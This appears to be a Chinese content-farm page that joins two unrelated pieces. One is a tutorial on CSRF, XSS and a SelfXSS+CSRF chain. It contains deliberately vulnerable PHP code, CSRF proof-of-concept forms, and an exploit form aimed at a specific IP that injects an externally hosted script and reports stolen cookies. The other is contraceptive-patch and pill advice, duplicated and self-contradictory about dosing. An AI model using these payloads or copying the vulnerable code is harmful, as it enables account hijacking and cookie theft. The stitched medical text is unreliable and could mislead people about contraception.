关于【助粘剂避孕怎么用】,避孕贴的正确使用方法和注意事项,今天乾乾小编给您分享一下,如果对您有所帮助别忘了关注本站哦。
内容导航:1、从XSS、CSRF到SelfXSS+CSRF组合拳经典案例剖析2、助粘剂避孕怎么用:避孕贴的正确使用方法和注意事项1、从XSS、CSRF到SelfXSS+CSRF组合拳经典案例剖析
#网络安全在我身边#
题记:今天给大家分享的是网络安全相关技术从XSS、CSRF到SelfXSS+CSRF组合拳经典案例剖析。
跨站请求伪造Cross-site request forgery(简称CSRF/XSRF)
原理:攻击者在用户未察觉的情况下凭借用户的身份向存在CSRF的网站发起恶意HTTP请求。
漏洞常见产生点:
1、后台管理,会员中心、用户添加、资料修改等2、被引用的文件没有验证token和referer
案例:
用户登录模块login.html:
<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>用户登录</title></head><body> <form action="login.php" method="post"> 账号:<input type="text" name="username"></br> 密码:<input type="password" name="password"></br> <input type="submit" value="点击登录" name="login"> </form></body></html>
动态脚本语言接收输入的用户名密码并登录login.php:
<?phpheader("content-type:text/html;charset=utf-8");if(!isset($_POST['login'])) { exit('illegal access!');}else{ $username = $_POST['username']; $password = $_POST['password']; include ('conn.php'); $sql = "SELECT * FROM user WHERE username='$username' and password='$password';"; $result = mysql_query($sql); if($row = mysql_fetch_array($result)) { session_start(); $_SESSION['username'] = $row['username']; echo $_SESSION['username']. ",welcome!"; echo '<a href="reg.html">添加用户</a>'; }}
存在csrf的用户注册模块reg.html:
<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>会员注册</title></head><body> <form action="reg.php" method="post"> 用户注册<br > 用户名:<input type="text" name="username"><br > 密码:<input type="password" name="password"><br > <input type="submit" name="submit" value="添加用户"></form></body></html>
动态脚本语言接收输入的用户名密码并登录reg.php:
<?phpheader("content-type:text/html;charset=utf-8");session_start();if(!isset($_SESSION['username'])) { echo '<script>alert("please login again!")</script>'; exit();}else{ $username = $_POST['username']; $password = $_POST['password']; include ('conn.php'); $sql = "INSERT INTO csrf VALUES ($username,$password)"; $result = mysql_query($sql); if($result) { echo '<script>alert("register success!")</script>'; }else{ echo '<script>alert("register fail!")</script>'; }}
数据库连接文件conn.php:
<?php$conn = mysql_connect("localhost","root","root");mysql_select_db("csrf",$conn);
使用reg.html添加用户时需要登录,因为reg.php会检验是否存在username的会话
我们在reg.html登录并抓包构造好POC,csrf.html:
<html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/reg.php" method="POST"> <input type="hidden" name="username" value="hacker" /> <input type="hidden" name="password" value="123456" /> <input type="hidden" name="submit" value="�·»�Š�”¨�ˆ·" /> <input type="submit" value="Submit request" /> </form> </body></html>
诱使用户点击csrf.html,成功注册
流程示意图:
跨站脚本攻击Cross Site Scripting(简称XSS)
原理:攻击者利用应用程序存在过滤不严的弱点输入可以显示在页面上对其他用户造成影响的恶意代码。
漏洞常见产生点:
参数无过滤并传入输出函数
1、搜索内容
2、发表文章
3、留言
4、评论回复
5、资料设置
1、反射型(输入–输出)案例:1、将前端获取的内容直接输出到浏览器页面
$content = $_GET['xss'];echo $content;
2、将前端获取的内容直接输出到HTML标签
<?php$content = $_GET['xss'];?><input type="text" value="<?php echo $content;?>">
闭合后的标签
<body><input type="text" value=""><script>alert(/xss/)</script>"></body>
3、将前端获取的内容直接输出到
<?php$content = $_GET['content'];?><script> var xss = '<?php echo $content?>'; document.write(xss);</script>
2、存储型(输入–进入数据库–取出数据-输出)xss.php
<?phpheader("content-type:text/html;charset=utf-8");$content = $_POST['content'];$conn = mysql_connect("localhost","root","root");mysql_select_db("xss",$conn);if ($content != null) { $sql = "INSERT INTO xss VALUES ('1','$content');"; $result = mysql_query($sql) or die('执行SQL语句失败'.mysql_error());}?><form action="" method="post"> <input type="text" name="content"> <input type="submit" value="提交"></form>
show.php
<?php$conn = mysql_connect("localhost","root","root");mysql_select_db("xss",$conn);$sql = "SELECT payload FROM xss where id=1";$result = mysql_query($sql);while($row = mysql_fetch_array($result)) { echo $row['payload'];}
插入数据
显示
3、DOM型(可能是存储型也可能是反射型)数据流向:URL->浏览器案例:
<?php$content = $_GET['content'];?><input type="text" id="tid" value="<?php echo $content;?>"><div id="show"> <script> var text = document.getElementById("tid"); var show = document.getElementById("show"); show.innerHTML = tid.value; </script>
SelfXSS+CSRF组合拳
SelfXSS就是只能对本地客户端产生影响的跨站脚本攻击,举例简单来说,比如获取到的cookie是自己的,显然这并没有什么实际危害,但是一旦结合跨站请求伪造则会导致危害升级,并且成为存储型的跨站脚本攻击。这里我做了个更改用户名的案例,漏洞常见产生点,账户修改信息处:
change1.php:
<?php header("content-type:text/html;charset=utf-8"); session_start(); $conn = mysql_connect("localhost","root","root"); mysql_select_db("csrf",$conn); $sql = "SELECT username FROM user WHERE id=1;"; $result = mysql_query($sql); while($row = mysql_fetch_array($result)) { echo "当前用户名:".$row['username']."\n"; $_SESSION['username'] = $row['username']; } echo '<form action="change.php" method="post"> 用户名:<input type="text" name="username"><br > <input type="submit" name="submit" value="修改用户名">';
change.php
<?phpheader("content-type:text/html;charset=utf-8");session_start();if(!isset($_SESSION['username'])) { echo '<script>alert("请重新登录!")</script>'; exit();}else{ $username = $_POST['username']; $conn = mysql_connect("localhost","root","root"); mysql_select_db("csrf",$conn); $sql = "UPDATE user SET username='$username' WHERE username=username;"; $result = mysql_query($sql); if($result) { echo '<script>alert("修改用户名成功!")</script>'; include("change1.php"); }else{ echo '<script>alert("修改用户名失败!")</script>'; }}
首先我们打开change1.php
观察该页面可以看到修改用户名模块,尝试XSS,发现只是一个SelfXSS
由源代码可以知道该页面没有防止csrf,因此可以通过selfxss+csrf来扩大危害,也可从请求包看出
EXP如下:
<html> <body> <script>history.pushState('', '', '/')</script> <form action="http://114.116.231.250/change.php" method="POST"> <input type="hidden" name="username" value="<sCRiPt sRC=https://******/ZSeF></sCrIpT>" /> <input type="hidden" name="submit" value="修改用户å" /> <input type="submit" value="Submit request" /> </form> </body></html>
诱使用户点击
成功取到cookie并且是存储型
2、助粘剂避孕怎么用:避孕贴的正确使用方法和注意事项
避孕贴的正确使用方法和注意事项
避孕贴是将避孕贴贴在皮肤上,然之后避孕贴会释放出孕激素以及雌激素,经过皮肤渗透之后,到达血管当中,起到避孕的作用。 避孕贴的使用时间和周期,一般在每个星期贴3片。一般以经期开始的第一天为一个周期的第一天,在第一个星期到第三个星期每个星期都换1片新的避孕贴,连续铁三个星期之后就可以取得很好的避孕效果。
贴避孕贴的身体部位可以是臀部,也可以是腹部、背部,伸直是前臂的外侧也可。在贴之前应该先将皮肤清洁干净,之后涂上润肤乳再贴上。注意在每次换心的避孕贴的时候,不要在同一个部位贴,以防造成皮肤敏感。建议贴避孕贴的时候贴在身体臀部位置,这样比起其他部位要舒服些,异物感不强。 避孕贴的功效很高,除了避孕以外,还可以调经,缓解痛经症状,另外避孕贴还能降低女性患盆腔炎、纤维瘤的概率。
但是使用避孕贴也是有一定副作用的,虽然这种方式比起子宫环等避孕方式功效要好的很多,但是在实际使用的过程当中对于体重超重的女性来说效果不是很理想,因为避孕贴当中释放的避孕荷尔蒙的'量不足,很容易导致意外怀孕情况的出现。
避孕贴的正确使用方法和注意事项
安全期避孕注意事项
安全期避孕法只适用于月经周期规律、长期同居、生活规律、双方能相互配合及谅解的夫妇,但基于其安全性不高,请采用此种方法避孕的女性注意以下几点:
1、安全期避孕法只适用于月经周期较规则的女性。
2、计算安全期避孕不适用于月经周期低于21天、高于35天,以及产后或哺乳中的妇女。
3、采用安全期避孕前,建议你先记录下半年来的月经周期,以便了解月经的规律性。
4、因女性生理周期会受到情绪及疾病的影响,单以安全期的计算来避孕的失败率偏高,因此建议应该与其他避孕法联合并用。
5、除了推算安全期以外,还应结合测量基础体温、观察白带改变等确定排卵日期,这样才能更好地判断避孕的安全期。
什么时候吃避孕药最有效
1、短效避孕药:主要成分是孕激素和雌激素。具有抑制排卵,阻碍子宫内膜正常生长,改变子宫颈黏液性质及改变输卵管正常蠕动等作用。适用于无基础性疾病或糖尿病的女性。从月经来潮当天算起的第5天开始服药,每天晚上服1片,连续服22天,可避孕1个月。
2、紧急避孕药:主要成分是孕激素。药物作用原理和短效避孕药基本一致。适用于40岁以下女性。主要有毓婷、诺爽、保仕婷及米非司酮片。一般是房事后72小时内服第一片,12小时后再服1片,越早服用效果越好。
3、长效避孕药:一般在月经来潮后,第五天服1片,20天以后再服1片。含人工合成的孕激素和长效雌激素。药物进入人体后,会储存在脂肪组织内,以后缓慢地释放出来,抑制排卵,起长效避孕作用。适用于不能放置宫内节育器,又不愿采用其他避孕方法的妇女。
避孕贴的正确使用方法和注意事项
避孕贴是将避孕贴贴在皮肤上,然之后避孕贴会释放出孕激素以及雌激素,经过皮肤渗透之后,到达血管当中,起到避孕的作用。 避孕贴的使用时间和周期,一般在每个星期贴3片。一般以经期开始的第一天为一个周期的第一天,在第一个星期到第三个星期每个星期都换1片新的避孕贴,连续铁三个星期之后就可以取得很好的避孕效果。
贴避孕贴的身体部位可以是臀部,也可以是腹部、背部,伸直是前臂的外侧也可。在贴之前应该先将皮肤清洁干净,之后涂上润肤乳再贴上。注意在每次换心的避孕贴的时候,不要在同一个部位贴,以防造成皮肤敏感。建议贴避孕贴的时候贴在身体臀部位置,这样比起其他部位要舒服些,异物感不强。 避孕贴的功效很高,除了避孕以外,还可以调经,缓解痛经症状,另外避孕贴还能降低女性患盆腔炎、纤维瘤的概率。
但是使用避孕贴也是有一定副作用的,虽然这种方式比起子宫环等避孕方式功效要好的很多,但是在实际使用的过程当中对于体重超重的女性来说效果不是很理想,因为避孕贴当中释放的避孕荷尔蒙的'量不足,很容易导致意外怀孕情况的出现。
本文关键词:避孕贴的正确使用方法和注意事项图片,避孕贴百度百科,避孕贴剂怎么使用,什么是避孕贴 避孕贴如何使用,避孕贴如何使用。这就是关于《助粘剂避孕怎么用,避孕贴的正确使用方法和注意事项(从XSS、CSRF到SelfXSS+CSRF组合拳经典案例剖析)》的所有内容,希望对您能有所帮助!